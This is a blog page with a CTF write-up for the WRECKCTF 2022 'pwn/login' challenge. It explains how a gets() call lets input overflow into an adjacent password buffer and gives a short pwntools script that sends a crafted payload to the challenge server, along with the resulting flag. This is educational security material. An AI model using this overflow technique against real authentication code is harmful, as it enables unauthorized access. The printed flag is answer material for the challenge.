<!DOCTYPE html>
<html lang="en">

    <head><title>WRECKCTF 2022 - pwn/login &ndash; einSimon</title>
<meta name="description" content="A website where I will post stuff that I think of being somewhat intersting.">

<meta name="viewport" content="width=device-width, initial-scale=1">
<meta charset="utf-8"/>



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.2/css/all.min.css" integrity="sha512-1sCRPdkRXhBV2PBLUdRb4tMg1w2YPf37qatUFeS7zlBy7jJI8Lf4VHwWfZZfpXtYSLy85pkm9GaYVYMfw5BC1A==" crossorigin="anonymous" />


<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/academicons/1.9.1/css/academicons.min.css" integrity="sha512-b1ASx0WHgVFL5ZQhTgiPWX+68KjS38Jk87jg7pe+qC7q9YkEtFq0z7xCglv7qGIs/68d3mAp+StfC8WKC5SSAg==" crossorigin="anonymous" />


<link rel="stylesheet" href="https://einSimon.codeberg.page/css/colour/gruvbox-dark.css">
<link rel="stylesheet" href="https://einSimon.codeberg.page/css/colour/dark-mode.css">
<link rel="stylesheet" href="https://einSimon.codeberg.page/css/risotto.css">
<link rel="stylesheet" href="https://einSimon.codeberg.page/css/custom.css">
</head>

    <body>
        <div class="page">

            <header class="page__header"><h1 class="page__logo"><a href="https://einSimon.codeberg.page" class="page__logo-inner">einSimon</a></h1>
<nav class="page__nav main-nav">
    <ul>
    
    
    <li class="main-nav__item"><a class="nav-main-item" href="/about/" title="">About</a></li>
    
    <li class="main-nav__item"><a class="nav-main-item" href="/blog/" title="">Blog</a></li>
    
    <li class="main-nav__item"><a class="nav-main-item" href="/writeups/" title="">CTF-WriteUps</a></li>
    
    <li class="main-nav__item"><a class="nav-main-item" href="/projects/" title="">Projects</a></li>
    
    </ul>
</nav>

</header>

            <section class="page__body">
    <header class="content__header">
        <h1>WRECKCTF 2022 - pwn/login</h1>
    </header>
    <div class="content__body">
        <p><em>you&rsquo;ll never get my password!</em></p>
<p><strong>login</strong> is a simple challenge in the <em>pwn</em> category.</p>
<h1 id="gathering-information">Gathering information</h1>
<p>Decompiling the <a href="../challenge">provided binary</a> with Binary Ninja reveales three functions:</p>
<ol>
<li>
<p><code>main</code>:
<img src="../main.png" alt="main"></p>
</li>
<li>
<p><code>load_password</code>:
<img src="../load_password.png" alt="loadPwd"></p>
</li>
<li>
<p><code>print_flag</code>:
<img src="../print_flag.png" alt="printFlag"></p>
</li>
</ol>
<p>With a quick glance at the main function we can see a call to <code>print_flag</code> which we want to trigger, but therefore we need to pass the <code>strcmp</code> check that compares our input to the actual password. Another thing we can notice in the main function are the two buffers being allocated and the unsafe function <code>gets</code>, which will allow us to overwrite a buffer.</p>
<p>Checking Binary Ninjas stack view for the main function
<img src="../main_stack.png" alt="mainStack"></p>
<p>discloses that we can simply modify the <code>password</code> buffer by overflowing the <code>inputBuffer</code> with our input.</p>
<p>As both strings need to match in order to get into the else clause of the if statement, we now need to write the same data into both buffers (for the strcmp we also need to keep in mind that strings in C are zero terminated).</p>
<h1 id="writing-the-exploitexploitpy">Writing the <a href="../exploit.py">exploit</a>:</h1>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">exploit</span>() <span style="color:#f92672">-&gt;</span> <span style="color:#66d9ef">None</span>:
    connection <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#34;challs.wreckctf.com&#34;</span>, <span style="color:#e6db74">&#34;31009&#34;</span>)
    payload <span style="color:#f92672">=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;A&#34;</span> <span style="color:#75715e"># Our password</span>
    payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">0xf</span> <span style="color:#75715e"># Terminating string and padding</span>
    payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;A&#34;</span> <span style="color:#75715e"># Overwriting the actual password</span>
    payload <span style="color:#f92672">+=</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\x00</span><span style="color:#e6db74">&#34;</span> <span style="color:#75715e"># Terminating String</span>
    connection<span style="color:#f92672">.</span>sendline(payload)
    connection<span style="color:#f92672">.</span>interactive()
</code></pre></div><p>Running the exploit on the remote server reveales the flag(<code>flag{i_wish_could_gets_more_runes}</code>):</p>
<p><img src="../flag.png" alt="flag"></p>

    </div>
    <footer class="content__footer"></footer>

            </section>

            <section class="page__aside">
                <div class="aside__about">
<div class="aside__about">
    
<h1 class="about__title">Info</h1>
<p class="about__description">A website where I will post stuff that I think of being somewhat intersting.</p>
</div>


<ul class="aside__social-links">
    
</ul>
</div>
                <hr>
                <div class="aside__content">
    
    
        <p>
            
            2022-10-03
        </p>
    

                </div>
            </section>

            <footer class="page__footer"><p class="copyright"></p>
<p class="advertisement">Powered by <a href="https://gohugo.io/">hugo</a> and <a href="https://github.com/joeroe/risotto">risotto</a>.</p>
</footer>

        </div>
    </body>

</html>
